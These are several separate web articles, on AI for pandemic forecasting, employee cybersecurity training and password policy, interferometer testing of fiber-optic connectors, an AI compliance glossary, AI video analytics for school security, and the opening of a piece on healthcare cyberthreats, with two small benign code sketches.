Research of this kind is an unbelievably huge task and has led to the development of a new discipline where machine learning (ML) and statistical models are used to predict the emergence of various diseases, likely animal hosts, geographical hotspots, and which viruses are most likely to affect humans. Scientists who support this technology firmly believe that the findings will guide the development of medicines and vaccines, and help everyone involved to study, observe, and predict situations accurately.
Naturally, all researchers do not agree with this approach. Many do not believe predictive technology can keep up with the frequently changing virome or the scale of what exists at any given point. True, there is a constant improvement of data and artificial intelligence (AI) models, but for such tools to be truly predictive of future pandemics, the efforts must include a very wide network of researchers spread across the globe.
AI spotted the first signs of Covid-19
Canada-based Bluedot was one of the first organisations to recognise the emergence of the Covid-19 pandemic and sound the alarm. It uses an AI-based algorithm that continuously searches global data to pinpoint the next outbreak of an infectious disease. HealthMap, the algorithm run at the Boston Children’s Hospital, also caught these first signs of Covid-19. So was the case with Mayo Clinic’s Coronavirus Map Tracking Tool.
Rapidly developing Natural-language processing (NLP) algorithms monitor global healthcare reports and news outlets in various languages, and flag mentions of diseases such as Covid-19, or endemic ones such as tuberculosis or HIV. Air-travel data is also monitored to assess the risks of spreading. Social media was found to be quite a reliable source of data during Covid-19. Data scientists at the University of Colorado, Boulder, used ML and a short-term forecasting model to analyse large datasets gathered from popular online platforms and compared the results to insights obtained from analysing the more conventional mobile device location data. As people travelled during the pandemic, or recovered and talked about their Covid experience, the technology recognised specific keywords and gathered relevant data. In 2021, when mask-wearing policies, lockdowns, and travel restrictions kept changing, this model was found to be far closer to reality than other models.
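At its simplest, the keyword-flagging step of such monitoring can be sketched in a few lines. Real systems use multilingual NLP models; the keyword list and tokenization below are deliberately naive and purely illustrative:

```python
# Deliberately naive sketch of the keyword-flagging step in such
# monitoring. Real systems use multilingual NLP models; the keyword
# list and tokenization here are illustrative only.

DISEASE_KEYWORDS = {"covid-19", "tuberculosis", "hiv", "ebola"}

def flag_reports(reports):
    """Return the reports that mention a monitored disease keyword."""
    flagged = []
    for text in reports:
        tokens = set(text.lower().split())
        if tokens & DISEASE_KEYWORDS:
            flagged.append(text)
    return flagged

reports = [
    "Cluster of tuberculosis cases reported at district hospital",
    "Local festival draws record crowds",
]
print(flag_reports(reports))  # only the first report is flagged
```

Everything hard in production systems, from language coverage to deduplication to ranking by credibility of source, lives beyond this step.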
Early buzz but not much later
However, after that initial buzz, AI could not do much. Almost all AI models were weak when applied to real-world clinical settings. Deep-learning models, when applied to CT scans and chest x-rays, were found to be unsuccessful. Perhaps a major reason for these failures was that the AI models were working on a real pandemic for the first time. Four areas were identified as the primary roadblocks: imperfect datasets, human failures, automated discrimination, and complex global conditions.
Researchers are hopeful that the disappointments during Covid-19 will pave the way to generate better and sturdier AI models.
For AI models to predict the emergence of a pandemic, the primary requirement is large amounts of reliable datasets, which is not always easy to gather. Different institutes across different countries have varying policies about sharing healthcare data. Further, individuals may not want their data shared either, even anonymously. For all the aspects to come together, leaders in healthcare, government, and businesses must be on the same page about privacy issues. AI models are only as good as the data they work on. So, given the many barriers to collecting good datasets, the predictions during Covid-19 were understandably below par.
Data entry errors because of tremendous pressure, insufficient manpower, hurry to reach conclusions, and wrong incentives – everything was at play during Covid-19. The inability of people in charge to interpret data and AI predictions correctly was another common error.
Predictions and treatment decisions made by healthcare authorities also affected recovery rates, despite the availability of AI models. Many disadvantaged groups received inappropriate or poor treatment because of AI biases, which can again be traced to human biases.
Complex global conditions
As mentioned earlier, data sharing is governed by different rules in different countries and that affects the quality and quantity of reliable data available. During the pandemic, there were many discussions and debates about sharing genome sequences across countries. Populations of different countries also reacted differently to the idea of sharing health data.
Prediction, diagnosis, and treatment are the three areas where AI can be best used. For AI models to learn and predict efficiently, a few factors must be corrected over time.
- Find better healthcare datasets, preferably in standardised formats, to create a centralised repository of data. Consider using synthetic data instead of real data to bypass the principles of privacy. New data processing techniques must be developed.
- Ensure greater diversity in the data collected. This will prevent automated discrimination and underrepresentation of disadvantaged groups.
- Promote greater cooperation across teams such as AI teams, researchers, clinicians, engineers, and even ethicists to ensure AI systems are aligned with the existing value systems.
- International data sharing rules must be outlined to facilitate data sharing without breaking any privacy rules. AI teams must be trained to recognise differences in data gathered from different regions of the world.
The fast global spread of Covid and the struggle health services faced to stay ahead of the disease drive home the need to use the best AI models available to track and predict pandemics. AI developers must continue working on predictive models to ensure that the next pandemic, if any, can be predicted preemptively and contained at the right time.
This blog was first published on Business Insider | <urn:uuid:4569bc71-9c98-464b-85e5-ce4f9353504e> | CC-MAIN-2024-38 | https://www.infosysbpm.com/blogs/business-transformation/can-ai-spot-the-next-pandemic-before-it-starts.html | 2024-09-18T02:39:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00623.warc.gz | en | 0.957525 | 1,279 | 3.71875 | 4 |
When we talk about cybersecurity, we tend to think first of anti-virus programs and maybe even adblockers. The weakest link, though, is not software or hardware. The weakest link is always the human element; more than half of security incidents can be linked to an employee who does something negative or who simply makes a mistake. The phrase “human firewall” is starting to come into use, and it refers to various methods that can be used to plug that weak spot. Primarily, this means education; employees and users need to learn to think about security and pay attention to the areas in which they are vulnerable. No amount of money invested into hardware and software can make up for weaknesses in training.
So, what do your employees need to know? All employees need to take part in cybersecurity training. This doesn’t have to be that expensive; it can include regular memos reminding people not to click on links in unsolicited email messages, cheat sheets on how to make a strong password, etc. Making it creative and fun can help people remember what to do. Quizzes, for example, can help people remember the rules. They also help to train employees about protecting their own data and identity, so that they understand that the importance of cybersecurity goes into daily life. Then, work with them on applying the following tools to create a strong human firewall:
- Strong passwords. Pass phrases are the best, but not all systems are compatible with them. Ban employees from using common passwords such as “password” or even “passw0rd” (number substitution is unhelpful). Secure password checkers are available, although be aware that they tend to say a password is stronger than it is. If employees have difficulty remembering passwords, encourage them to use mnemonics or use a password manager (so they only have to remember the master password). Do not allow passwords to be put on monitors or cubicle walls.
- Require regular password changes and train employees to change their passwords substantially rather than trivially, say, from “jane01” to “jane02.” Implementing code that prevents tight password rotation can also help (for example, if passwords are changed every 30 days, disallow reuse of the same password within six months to prevent employees from cycling through “Password 347,” “Password 365,” “Password 347”). These techniques are all used because passwords are hard to remember; so, again, talk about mnemonics and other ways to make memorizing passwords easier.
- Train employees in an ongoing manner on cyber security. Employees should never click on links in emails unless they are very sure of the source and were expecting the email. Teach people about email spoofing (in which cyber criminals make an email appear to be from a trusted source) and phishing. Phishing drills (sending employees fake emails and seeing whether they click on the link, ignore the mail, or report it) can be very helpful. Also talk to employees about installing software from unknown sources and visiting potentially dangerous sites such as torrents. Employees who breach protocols should be disciplined in a fair and constructive manner (malice is grounds for termination, but stupidity and ignorance can generally be fixed).
- Develop security protocols that are seamless and as close as possible to invisible to the end user. Employees will resent protocols that make them feel restricted or spied on (for example, if you are using device wiping software, especially on their own devices, you should consider very carefully how and when it is implemented and how to keep employees in the loop and in control).
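The "no tight rotation" check mentioned above can be sketched as a similarity test against recent passwords. This is an illustrative sketch only: the history window and 0.8 similarity threshold are arbitrary choices, and a production system would not keep a plaintext password history like this one does:

```python
# Illustrative sketch of a check against tight password rotation:
# reject a new password that was used recently or is nearly identical
# to a recent one (e.g. "jane01" -> "jane02"). The similarity threshold
# is an arbitrary choice, and a production system would not keep
# plaintext password history like this.

from difflib import SequenceMatcher

def password_allowed(new_password, recent_passwords, similarity_limit=0.8):
    """Reject reuse of, or trivial edits to, recently used passwords."""
    for old in recent_passwords:
        if new_password == old:
            return False
        if SequenceMatcher(None, new_password, old).ratio() >= similarity_limit:
            return False
    return True

history = ["jane01", "Password 347"]
print(password_allowed("jane02", history))                 # False: trivial edit
print(password_allowed("correct horse battery", history))  # True
```

A similarity check catches the "increment the last digit" habit that exact-match reuse rules miss.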
The most important aspect of building a strong human firewall is continuing education and training. Proper training can turn all of your employees, not just IT administrators, into cybersecurity heroes. It can also help them be safer and more secure in their own lives. | <urn:uuid:575ecf60-68e5-48c2-bd72-0568993978cf> | CC-MAIN-2024-38 | https://www.accessoneinc.com/blog/human-firewall-make-your-employees-cybersecurity-heroes/ | 2024-09-20T14:26:34Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00423.warc.gz | en | 0.955251 | 791 | 3.234375 | 3 |
by Charles Lohrmann
An interferometer can provide the most accurate, detailed testing of connectors, and is also an effective in-the-field troubleshooting tool.
When viewing an Optical Time Domain Reflectometer (OTDR) trace, you encounter high attenuation at a connected pair—a fault. You may also encounter a ghost, which is a large reflective event at a point in the passive fiber link where there is a change in media (index of refraction). This occurs at the connector or the end of the fiber—the change from glass to air.
Provided the OTDR is properly set up for the test, the ghost shows the location of the fault. But an interferometer can determine which connector is defective.
In this article, we'll discuss how an interferometer can take OTDR testing to the next level, accurately measuring the radius of connector curvature, offset of polish, and fiber height.
In the change from glass to air, energy reflected back to the OTDR is of such intensity that the light pulse is reflected off of the connector at the OTDR and is again returned a second time. As the OTDR converts the travel time of the light pulse into distance, the reflective event is painted on the screen a second time—thus, a ghost.
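The time-to-distance conversion the OTDR performs can be sketched numerically: the pulse travels out and back, so the one-way distance is half the round-trip path. The group index of 1.468 below is a typical assumed value, not one given in the article:

```python
# Numerical sketch of the time-to-distance conversion the OTDR
# performs. The pulse travels out and back, so one-way distance is
# half the round-trip path. The group index of 1.468 is a typical
# assumed value, not one given in the article.

C_VACUUM = 299_792_458.0  # speed of light in vacuum, m/s
N_GROUP = 1.468           # assumed group index of refraction

def otdr_distance_m(round_trip_time_s):
    """One-way distance to a reflective event from round-trip time."""
    return (C_VACUUM / N_GROUP) * round_trip_time_s / 2.0

# A 10-microsecond round trip corresponds to roughly 1 km of fiber.
print(round(otdr_distance_m(10e-6)))  # 1021
```

This is also why a ghost appears at twice the true distance: the doubly reflected pulse has spent twice the round-trip time in the fiber.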
The first figure (at right, top) shows the reflective event on an unterminated fiber, while the one below shows the same event with a properly terminated connector. These figures show the extreme. But what if the connector looks "good" in a fiber scope? Does the ghost then represent a fault? Provided the OTDR has been set up properly (the pulse width and pulse duration appropriate for the fiber length), then yes, a ghost represents a fault at the connector.
For most of us, when we look into the fiber scope and the end face of the connector looks perfect, we determine that the connector is "good." While true, what we're seeing is the two-dimensional view of a three-dimensional object. Fiber connectors, such as the ST, SC, and LC, are domed, while connectors such as the APC, MPO, and MPT have a different configuration.
Determining the connector's role
Before we can determine the cause of the fault, we need to determine what part the connector plays in the passive optical-fiber link. By definition, the purpose of the connector is to provide a temporary connection between two optical-fiber links that couples the light with a minimum of insertion loss (attenuation) and reflectance.
The primary connectors in use today in the enterprise LAN are what are termed Physical Contact (PC) type. The fiber connector is polished so that the fiber is at the center and the highest point, and is first to meet. There is no air gap, fibers compress until the ferrules contact, and the ferrules take the majority of the compressive force.
One key optical parameter for connectors is fiber attenuation. It is measured in dB per mated pair (the light passing through one connector is meaningless, as it is going nowhere). Attenuation is the sum of losses caused by:
- Overlap of the fiber cores;
- Alignment of the fiber axis;
- Fiber Numerical Aperture;
- Mating space between connector barrels;
- Reflection at fiber ends;
- Angular misalignment;
- Axial alignment.
Overlap is the sum of several different effects—the axial and angular alignment of the two fibers, connector and coupling, variations in core diameter, concentricity of the core within the cladding, and the eccentricity of the core.
For axial alignment, a good rule of thumb is an offset of 10% equals 0.6 dB loss. For a 50-µm fiber, that equates to 5 µm; however, for singlemode, that distance is only .8 to .9 µm. When the fibers are out of angular alignment (in the field, the most common cause is a defective coupler), the light entering the second fiber is at a steeper angle; thus, some of the light is refracted into the cladding.
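The 10-percent rule of thumb quoted above can be turned into a rough numerical estimate. The linear scaling below is an illustrative approximation, not a rigorous coupling-loss model:

```python
# The 10% rule of thumb quoted above, turned into a rough numerical
# estimate. The linear scaling is an illustrative approximation, not
# a rigorous coupling-loss model.

def offset_loss_db(offset_um, core_diameter_um):
    """Approximate loss from lateral core offset (rule-of-thumb scaling)."""
    offset_fraction = offset_um / core_diameter_um
    return 0.6 * (offset_fraction / 0.10)

# 5 um of offset on a 50 um multimode core is the 10% case: ~0.6 dB.
print(offset_loss_db(5.0, 50.0))  # 0.6
# The same 5 um offset on a ~9 um singlemode core is far more costly.
print(round(offset_loss_db(5.0, 9.0), 2))  # 3.33
```

The second result shows why singlemode connectors demand sub-micron alignment while multimode connectors are far more forgiving.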
Fiber Numerical Aperture (NA) is defined as the acceptance angle of the light that enters and is propagated in the fiber. This has also been termed the cone of acceptance, as shown in the figure on page 8. The light exits the fiber in exactly the same cone as it entered.
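The cone of acceptance can be computed from the numerical aperture, since NA equals the sine of the maximum acceptance half-angle for light entering from air. The NA value of 0.20 below is a typical figure for 50-µm multimode fiber, assumed for illustration:

```python
# The cone of acceptance computed from the numerical aperture, using
# NA = sin(theta_max) for light entering from air. NA = 0.20 is a
# typical value for 50 um multimode fiber, assumed for illustration.

import math

def acceptance_half_angle_deg(numerical_aperture):
    """Half-angle of the cone of acceptance, in degrees, from air."""
    return math.degrees(math.asin(numerical_aperture))

print(round(acceptance_half_angle_deg(0.20), 1))  # 11.5
```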
Reflections, more properly termed Fresnel reflections, occur when light exiting the fiber encounters a material with a different index of refraction, and are the result of the change from glass to air. Fresnel reflection loss is also affected by distance—the greater the distance between the fiber ends, the greater the loss. Internal connector reflections can cause spurious modulation and noise in laser light (feedback lasers), which may result in system failure.
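At normal incidence, the reflected power fraction follows the standard Fresnel formula. A minimal sketch, assuming typical indices of 1.5 for glass and 1.0 for air:

```python
# Fresnel reflection at a normal-incidence boundary, the glass-to-air
# change in index of refraction described above. Indices of 1.5
# (glass) and 1.0 (air) are typical assumed values.

import math

def fresnel_reflectance(n1, n2):
    """Fraction of optical power reflected at a normal-incidence boundary."""
    return ((n1 - n2) / (n1 + n2)) ** 2

R = fresnel_reflectance(1.5, 1.0)   # glass to air
loss_db = -10 * math.log10(R)       # equivalent return loss
print(round(R, 3), round(loss_db, 1))  # 0.04 14.0
```

That roughly 4% (about 14 dB) reflection at an open glass-air interface is the strong reflective event that paints the ghost on the OTDR trace.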
Reflections of a ghost
Reflection noise is an important concern in analog video as it may saturate the transmission device, causing system failure. As the distance increases, so does the corresponding loss. These reflections, with enough magnitude, are what we see on the OTDR trace as a ghost.
As we have seen in the forgoing discussion, that "little, insignificant" connector has a great deal of significance in the passing of the signal through the passive optical fiber link. The question now becomes, how do you test an optical-fiber connector to the parameters just discussed?
Up until a few years ago, we could not. It was done in the laboratory, using a test set called an interferometer. The tester was highly complex, susceptible to movement (it sat on a large concrete base for stability), and was not considered for field use. Several years ago, however, two companies—FIBO (www.promet.net/) and Norland Products (www.norlandprod.com/)—developed a field transportable unit. With the development of the field transportable interferometer, (it has been in use in the laboratory for many years), you now have the ability to test terminated connectors in the field.
The interferometer uses the principle of light-wave interference, which occurs when two or more waves of the same frequency or wavelength combine to form a single wave whose amplitude is the sum of the amplitudes of the combined waves. Constructive and destructive interference are the most striking examples of light-wave interference. Constructive interference occurs when the light waves are completely in phase with each other (the peak of one wave coincides with the peak of the other wave). Destructive interference occurs when the light waves are completely out of phase with each other (the peak of one wave coincides with the trough of the other).
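The constructive and destructive extremes described above follow from the standard phasor sum of two equal-frequency waves; a small sketch:

```python
import math

def resultant_amplitude(a1, a2, phase_rad):
    """Amplitude of the superposition of two equal-frequency waves,
    a1*sin(wt) and a2*sin(wt + phase), via the phasor-sum identity."""
    return math.sqrt(a1**2 + a2**2 + 2 * a1 * a2 * math.cos(phase_rad))

print(resultant_amplitude(1.0, 1.0, 0.0))      # in phase (constructive): 2.0
print(resultant_amplitude(1.0, 1.0, math.pi))  # out of phase (destructive): 0.0
```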
Interferometers can produce images and data to sub-micron accuracy using the principle of wave interference. They use a single coherent light source, and to produce two separate light waves for interference to occur, a partially reflective beam splitter is used. As the light hits the beam splitter, one wave front is transmitted through the beam splitter, through an objective lens, and to the object being examined. The other light wave reflects off of the beam splitter onto a stationary reference mirror.
After each light wave has been reflected off of the surfaces (the surface of the object being examined and the reference mirror), the waves combine to produce constructive and destructive interference waves, also known as light and dark fringes, respectively. Each dark fringe identifies a specific height on the surface of the object being examined. Typically, two adjacent dark fringes have a height difference of half a wavelength of the light being used, and so can show a surface contour of the connector end face that is similar to the concept of contour maps used to show different elevations of a land surface.
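Because adjacent dark fringes are separated by half a wavelength of height, a fringe count converts directly into a surface-height difference. A small sketch; the 633-nm HeNe source wavelength is an assumption for illustration:

```python
def height_from_fringe_intervals(num_intervals, wavelength_nm):
    """Surface-height difference spanned by a number of dark-fringe
    intervals, each interval being half a wavelength."""
    return num_intervals * wavelength_nm / 2.0

# Three fringe intervals under an assumed 633-nm source:
height_nm = height_from_fringe_intervals(3, 633.0)
print(f"height difference: {height_nm:.1f} nm (~0.95 µm)")
```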
Tool testing and measurement
The interferometer tests several components of the connector. The three major measurements are the radius of curvature, offset of polish (also called Apex offset), and fiber height.
The radius-of-curvature portion of the test determines the overall diameter of the best-fit sphere and its relationship to the actual end of the connector under test. The spacing and diameter of the circular fringe pattern are directly related to the radius of curvature.
The offset of polish determines the actual centerline of the fiber and its relationship to the actual centerline of the best-fit curve. With the ideal connector, both centerlines would be the same.
The fiber height portion of the evaluation determines the amount of fiber that is above or below the end of the connector end face.
Based on these three parameters, a test report may be generated as shown in the figure above. In this case, the connector is within limits for all of the tested parameters; however, the basic question remains—why field-test the connectors? To answer this question, you'll need to examine the conditions that may occur when you join two connectors, and the relationship between the two.
The objective is minimum loss as well as minimum reflectance. Optical-fiber connectorization is based on the principle of Physical Contact (PC). When two "ideal" connectors are joined, the interface should be as shown in the figure "An 'ideal' connector interface" (page 12).
When using the PC concept, the only concern is the center of the connector. The fibers are polished so that they sit at the center and at the highest point of the end face, and are therefore the first to meet. There is no air gap. The fibers compress until the ferrules contact and absorb the majority of the compressive force.
Using interferometry helps guarantee optical performance by providing consistent quality control of the polishing process. This assures long-term stability when connectors are exposed over time to changes in temperature, pressure, and the effects of vibration.
So, what is a "bad" connector? It can be one of three types: undercut, which is the result of overpolishing; offset; and protrusion, which is the result of underpolishing.
Undercut results in an air gap between the connectors and a corresponding increase in both attenuation and reflectance. In this instance, the glass within the connector may "piston" over time. This is probably the failure most often seen. (This condition is generally caused when a high-magnification scope is used and the tech tries to get the last little scratch off the end face of the connector.)
The second condition, offset, may be caused by not holding the polishing puck tight-and-square to the lapping film during the polishing process. With the use of today's pre-radiused connectors, and proper polishing technique, offset should not be a major problem.
In the last type of failure, protrusion, the fiber protrudes from the end of the connector. When the end face of one connector meets the second, something has to give. As shown in the figure on page 13, the result is push back—the fiber on the protruding connector pushes the fiber on the second connector back into its ferrule. This is the best case. Have you ever wondered why a connector that was good yesterday was found shattered today? Yes, under pressure, glass will break, and usually at the most inopportune time.
Factory-polished, or not?
At this point, I can see many of you thinking, "all of this is great, but we only use 'factory-polished' connectors." But what constitutes a factory-polished connector? What is the manufacturing process? Some are machine-polished; however, as more and more of these products are manufactured offshore, a great many are hand-polished in the factory. Factory quality control is dependent on a manufacturer's quality-control program. Even so, quality control depends for the most part on statistical testing. If a representative number within a batch pass, it is assumed that the remainder will also pass. (Remember, that is why the U.S. passed the "Lemon Law.")
When and which connectors should you test with an interferometer? The answer is about the same as the answer to "when should you use an OTDR?" (See "The right tools for accurate fiber-optic testing," CI&M August 2008, pg. 13.) The primary test for any optical-fiber passive link remains the Optical Loss Test using the Optical Loss Test Set (OLTS). A part of this test set includes the reference cables, which should be of the highest quality.
This is one of the reasons why the TIA has recommended the use of singlemode-grade connectors for multimode reference cables. It has been my experience over the years that once the reference cables (which came with the test set) are worn out, the replacement is not a new reference cable from the test-set manufacturer, but any patch cord available. OLTS testing should also include the testing of the launch and receive cables for the OTDR.
You do not need to test every connector that you install. Follow the guideline normally applied to OTDR testing requirements—they are about the same. First priority would be any circuit where low loss and reflectance are a priority—both data and video. Next are the backbone circuits that are designed for transmission at high data rates—10 Gbits/sec and above. This applies not only to the permanent part of the circuit but also to the patch cords. Short circuits, such as fiber-to-the-desktop, once they have passed the optical loss test, should not require any further testing.
The interferometer is also an excellent troubleshooting aid. If you encounter a circuit that shows higher-than-expected loss or ghosts, in most cases the fault is in the connector. When the connector looks good in the fiber scope and the OLTS will not give the answer, the interferometer will.
When both the connectors pass, the only remaining item is the coupling test. The interferometer is the only method that I know of that will pinpoint this defect.
Another use for the interferometer is fiber connectorization training. I began using the interferometer in our OSP fiber course about two years ago and have found that, even with the "old fiber hands," there is a tendency to over-polish. Over-polishing results in undercut and distortion of the connector end face, thus generating higher loss and high reflectance. If the technician can produce connectors that pass the interferometer in training, the same result should show up in the field.
Lastly, if you use crimp-style connectors or pigtails, the interferometer is an excellent quality-control tool. When you receive a new batch of connectors or pigtails, perform your own quality-control test. If the first sample shows bad connectors, test the remainder of the batch. It is much more cost-effective to catch a problem in the shop than after the connector has been installed in the field.
Tools of assurance
Using common troubleshooting tools—a visual fault locator (VFL), OLTS, OTDR, and the interferometer—will ensure your customer has the highest quality optical-fiber network possible.
CHARLES C. LOHRMANN, RCDD/OSP, TPM, RITST, BICSI master instructor, is chief financial officer at TSI Compass International Limited Inc. (www.tsicompass.com). NEIL WAGMAN is sales manager with Norland Products Inc. (www.norlandprod.com). | <urn:uuid:b214c303-3ce3-4c98-bef8-8660083e7b6b> | CC-MAIN-2024-38 | https://www.cablinginstall.com/connectivity/article/16466315/optical-fiber-testing-to-the-last-nanometer | 2024-09-20T14:12:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00423.warc.gz | en | 0.933012 | 3,211 | 3.09375 | 3 |
Get started with the most important terms, explained
The AIC4 (Artificial Intelligence Cloud Service Compliance Criteria Catalogue) defines minimum requirements for the secure use of machine learning methods in cloud services.
Bias describes a systematic error that can result from either insufficient data or judgment errors. A cognitive bias in machine learning models can lead to discrimination of certain people.
The Bundesamt für Sicherheit in der Informationstechnik (BSI) is the German government's cybersecurity authority and is shaping secure digitization in Germany. The AIC4 criteria catalogue was largely developed by the BSI.
The Cloud Computing Compliance Criteria Catalogue (C5) defines minimum requirements for secure cloud computing and is primarily aimed at professional cloud providers, their auditors, and customers.
With the Conversational AI platform Cognigy.AI, companies can deploy intelligent voice and chatbots across the organization to automate their customer/employee communications at all touchpoints.
Conversational AI is a branch of artificial intelligence that utilizes software and technologies such as natural language processing, machine learning, and automatic speech recognition to facilitate communication between a human and a machine.
Explainable AI is a concept that makes artificial intelligence methods, e.g. neural networks or deep learning systems, explainable and comprehensible. Among other things, it is intended to solve the so-called "black box" problem, meaning that it cannot be clearly explained how a machine learning model reaches a decision. The need for explainable - and thus trustworthy - artificial intelligence is an important field of action in the AIC4 catalogue.
Natural Language Processing (NLP) enables computers to understand and interpret human language.
Natural Language Understanding (NLU) is a sub-field of NLP that explicitly deals with the understanding of human language. It is primarily concerned with nuances such as context, mood (so-called "sentiment"), and syntax.
PricewaterhouseCoopers (PwC) is Germany's leading auditing and consulting firm. The company audits AI services as part of the AIC4 criteria catalogue and provides objective audit reports.
Educational institutions are witnessing an ever-growing technology integration — be it interactive whiteboards or online learning platforms. It’s clear that technology is reshaping how we teach and how students learn.
Now, let’s zoom in on a different branch of technology used in education — video analytics. Imagine a tool that captures video and analyzes captured footage using artificial intelligence (AI).
Video analytics in K-12 education can surface insights and identify patterns that help improve school safety, security and operations. And by utilizing AI, education video analytics systems can detect anomalies, monitor campus activities and aid in incident investigations.
This technology goes beyond watching recorded footage — it’s about leveraging technology to create safer, more efficient learning environments for students. This article dives deeper into AI video analytics in school security so you can decide whether it’s right for you.
Understanding AI Video Analytics
Video analytics monitors, analyzes and manages massive amounts of video using modern algorithms and machine learning (ML). It’s like having an intelligent security assistant that watches over your school campus 24/7.
Now, let’s look at the critical components of a video analytics system. You’ve got your cameras — which are the eyes of the operation, capturing all the action. Then, there are sensors that pick up additional data, such as motion or sound. But the real magic happens with AI-powered analytical software.
Video analytics is the brain behind the cameras, helping them do more than record footage. With AI in the mix, video analytics becomes even more powerful. AI adds a layer of brain power by teaching the system to recognize patterns, identify objects and understand human behavior.
Applications in K-12 Education
The use of AI in education in conjunction with video analytics can create safer learning environments where students can thrive and succeed. Here is how AI video analytics can be used in K-12 education.
Enhancing School Security
AI video analytics constantly monitor the school’s activities to ensure the safety of its students and staff. It can flag anything out of the ordinary. For instance, someone lingering in a restricted area or a sudden change in lighting. It can even recognize faces or license plates, helping to track down missing students or identify unauthorized visitors.
By constantly scanning the premises, AI video analytics is a proactive measure against potential threats. This approach helps maintain a secure environment for teaching and learning.
Facilitating Incident Investigation
In the unfortunate event of an incident, such as bullying, theft, or vandalism, AI-based video analytics can expedite and streamline the investigation process. Analyzing video footage can provide vital insights into events, assisting authorities in resolving conflicts and responding to situations quickly.
For example, AI video analytics can provide valuable insights into a physical altercation. It can help identify the participants, trace their activities and give critical evidence for disciplinary action or legal procedures. AI video analytics speeds up the investigative process by quickly analyzing large volumes of data, ensuring a thorough and accurate response to incidents.
Supporting Conflict Resolution
AI video analytics offers objective, evidence-based insights into interpersonal disputes or disciplinary issues. By analyzing video evidence, it is possible to uncover the root causes of conflicts. Video footage can also estimate the severity of situations and support constructive solutions.
For example, in cases of bullying or harassment, AI video analytics can detect patterns of behavior, monitor interactions and provide useful evidence for intervention or counseling. With its ability to recognize subtle cues and behaviors, these systems help institutions efficiently manage problems. As a result, it can promote a secure and inclusive learning environment for all students.
Enabling Emergency Response
AI video analytics ensures a timely and coordinated response during crises, such as fire drills or lockdowns. Monitoring crowd behavior and identifying potential threats or bottlenecks enables authorities to assess the situation and apply relevant safety measures.
For example, during a lockdown, AI video analytics may follow individual movements, detect security breaches and offer real-time information to first responders. AI video analytics improves the effectiveness of emergency response systems by analyzing complicated circumstances and providing actionable insights.
5 Benefits for Educators and Administrators
Video analytics in K-12 education benefits students, educators and administrators alike. Here are five advantages to remember:
1. Enhanced Safety and Security
AI-powered security solutions add an extra layer of protection by continuously monitoring activity and detecting potential threats in real-time. These systems operate as vigilant watchdogs, identifying unauthorized individuals and detecting aberrant behavior patterns to prevent situations from escalating.
2. Efficient Resource Allocation
AI video analytics optimizes resource allocation by giving helpful information on campus operations and utilization. Administrators can make better resource allocation, scheduling and facility management decisions based on various metrics. These metrics include student movement, facility usage and traffic patterns. This results in more efficient resource use, better logistical planning and increased productivity.
3. Data-Driven Decision-Making
AI video analytics helps institutions make data-driven decisions by analyzing large volumes of data quickly and accurately. For instance, these systems can help customize instructional tactics, identify growth areas and personalize student learning experiences.
This is made possible by video analytics’ actionable insights into student behavior, academic performance and campus dynamics. Similarly, admins can utilize data analytics to evaluate policy efficacy, monitor key performance indicators (KPIs) and promote continuous improvement throughout the school ecosystem.
4. Proactive Intervention and Support
Educators can help children achieve academically and emotionally. Video analytics can help monitor student behavior patterns, spot symptoms of discomfort or disengagement and highlight possible problems early on. This proactive approach to student support creates a positive learning environment where all students feel appreciated and encouraged to achieve their full potential.
5. Streamlined Operations and Workflow
AI video analytics improves operations by automating regular tasks and optimizing workflow processes. AI-powered security tools can automate routine tasks like visitor access and tracking school attendance. Automation allows educational institutions to focus on more strategic objectives. As a result, it can lead to smoother operations and higher employee morale.
Challenges and Considerations
Implementing AI video analytics in K-12 education comes with its challenges. Here are the potential hurdles and considerations of education video analytics:
- Privacy concerns: Schools must establish policies and procedures for data collection, storage and usage. They must comply with relevant regulations such as the Family Educational Rights and Privacy Act (FERPA). Also, implementing data encryption and access controls can safeguard sensitive information.
- Resource constraints: Limited budgets and resources can pose challenges when adopting AI video analytics. Schools can overcome this by exploring cost-effective security technology solutions. They can also leverage open-source software and seek partnerships with technology providers. Training staff and educators on using AI tools effectively may also help.
- Technical limitations: Technical challenges may arise, such as compatibility issues and system integration complexities. Schools should conduct thorough testing and pilot programs to identify and address technical hurdles early. Work with experienced vendors or seek expert guidance to help mitigate these technical risks.
- Ethical use of AI: Schools must prioritize transparency, fairness and accountability when implementing AI video analytics. Educating stakeholders on the ethical implications of AI technology and cultivating an ethical decision-making culture are critical steps in promoting responsible AI use in education.
Unlock Your School’s Potential With AI Solutions by BCD
With its capabilities, AI video analytics can transform K-12 education. Unlock your school’s potential with BCD’s AI-ready solutions tailored to the unique needs of educational institutions.
Since 1999, BCD has been at the forefront of purpose-built video storage solutions. We partner with globally known security pioneers to provide AI video surveillance systems. With our security technology and commitment to customer satisfaction, schools can create safer, more engaging learning environments for their students.
Contact us online today for further information. | <urn:uuid:6bd0f1d0-bf5e-48dd-bdb5-1c4c743b6110> | CC-MAIN-2024-38 | https://www.bcdvideo.com/blog/video-analytics-in-k12-education/ | 2024-09-09T15:36:30Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651103.13/warc/CC-MAIN-20240909134831-20240909164831-00523.warc.gz | en | 0.917737 | 1,598 | 2.875 | 3 |
Cyberattacks on the healthcare sector are rising and becoming more sophisticated today, and big hospitals and small private clinics are both targets. Just in the past three years, more than 93% of healthcare companies have suffered a data breach. There has also been a 45% increase in cyberattacks targeting healthcare organizations globally since November 2020.
Why do cybercriminals target the healthcare industry?
Cybercriminals target healthcare companies because they store large amounts of protected health information (PHI) such as medical records, Social Security numbers, credit card details, and other similar data. Hackers steal these types of data and sell them on the Dark Web.
It doesn’t help that many firms still use outdated technology and legacy systems. According to a Duo Security report, 76% of healthcare organizations in 2020 were still using computers running Windows 7, an operating system that no longer receives updates or security patches. Many companies do, in fact, fail to keep their systems up to date not just because of costs, but also due to concerns that upgrading would cause operational disruptions.
What are common cyberthreats to healthcare?
Being aware of the most frequent cyberthreats to healthcare can help protect your business from data breaches and other disasters. Let’s take a look at some of them:
Phishing involves an attacker sending out a fraudulent email, text message, or making a call to trick a victim into giving out confidential information. And today, healthcare is one of the industries that are often victimized by phishing attacks.
